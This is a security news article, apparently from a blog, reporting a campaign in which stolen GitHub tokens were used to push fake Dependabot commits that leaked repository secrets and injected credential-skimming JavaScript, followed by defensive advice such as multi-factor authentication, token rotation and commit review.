Stolen GitHub Credentials Used to Push Fake Dependabot Commits
Introduction
Threat actors have been using stolen GitHub personal access tokens to push fake Dependabot contributions to hundreds of GitHub repositories, according to a report by application security firm Checkmarx. The attackers used the stolen access tokens to gain access to the repositories and inject malicious code to steal sensitive information and passwords. By disguising their activity as legitimate Dependabot commits, the threat actors were able to evade detection and gain unauthorized access to the targeted projects.
The Attack
The campaign, which was first identified in July, involved the use of stolen GitHub personal access tokens to gain access to repositories and push malicious code. The attackers faked commit messages to make them appear as if generated by Dependabot, GitHub‘s automated dependency management tool. This technique deceived developers into believing that the commits came from GitHub‘s tool, making it more difficult to detect the malicious activity.
As part of the campaign, the attackers targeted hundreds of repositories, including private ones, and added a new “hook.yml” file as a workflow file. This allowed them to send GitHub secrets to an external server on every push event. Additionally, the attackers modified all .js files within the targeted projects by appending obfuscated code at the end. This code, when executed in a browser, would create a new script tag and load an additional script from a remote server. This script intercepted password-based forms and sent user credentials to the attackers.
The Implications
The use of stolen GitHub personal access tokens to push malicious code highlights the vulnerabilities that exist in the software supply chain. Developers often rely on trusted sources like GitHub for their code, but this incident serves as a reminder to be cautious about where code is obtained from. Even trusted sources can be compromised, and it is crucial for developers to verify the code they receive.
The attackers’ ability to disguise their activity as legitimate Dependabot commits also raises concerns about the lack of scrutiny given to automated dependency management tools. Many developers may not thoroughly check the actual changes made by Dependabot, making it easier for threat actors to hide their malicious activity. Increased vigilance and scrutiny of automated tools is necessary to prevent such incidents in the future.
The Advice
To protect against similar attacks, developers and organizations should prioritize the security of their software supply chains. Here are some recommended steps:
1. **Use Multi-Factor Authentication**: Implementing multi-factor authentication for all GitHub accounts can help prevent unauthorized access to repositories. This additional layer of security makes it more difficult for threat actors to use stolen credentials.
2. **Regularly Update and Rotate Access Tokens**: Developers should regularly update and rotate their access tokens to mitigate the risk of token compromise. This practice helps prevent attackers from using stolen tokens for an extended period.
3. **Verify Commit Changes**: Developers should carefully review commit changes, especially those made by automated tools like Dependabot. By checking the actual code changes, developers can detect any suspicious activity or malicious code injected into their projects.
4. **Implement Code Review Practices**: Organizations should establish code review practices that include security checks. This helps identify any vulnerabilities or malicious code introduced into the codebase, providing an opportunity to address them before deployment.
5. **Educate Developers**: Organizations should provide training and education for developers on best practices for secure coding and reviewing dependencies. This can help raise awareness of the risks and enable developers to make informed decisions when utilizing automated tools or integrating third-party code.
Conclusion
The incident involving stolen GitHub credentials used to push fake Dependabot commits serves as a reminder of the vulnerabilities in the software supply chain. Developers and organizations must prioritize the security of their code repositories, verifying the code they receive and implementing best practices for secure coding. By adopting these measures, developers can reduce the risk of unauthorized access and protect their projects from malicious code injection.
<< photo by Dan Nelson >>
The image is for illustrative purposes only and does not depict the actual situation.
You might want to read !
- Putting Data Security in Focus: Results from a Comprehensive Survey Expose Companies’ Strategies and Approaches
- Data at Risk: Unveiling the Menace of GPU Side-Channel Attacks
- New Title: The Critical Libwebp Vulnerability: A Looming Exploitation Threat Receiving a Maximum CVSS Score
- macOS 14 Sonoma Unveils Robust Security Patches
- macOS 14 Sonoma: Addressing Vulnerabilities in the Apple Ecosystem
- The Rise of Collaborative Development: Google Open Sources BinDiff, Revolutionizing Binary File Comparison
- The Rising Threat: Over 100,000 Stolen ChatGPT Account Credentials Sold on Dark Web Marketplaces
- Proactive Security: Revolutionizing Enterprise Security Strategies
- The Controversial Surveillance Dilemma: Hikvision Intercoms and Invasion of Privacy
- Unmasking “Culturestreak”: The Hidden Threat of Malware in GitLab’s Python Package
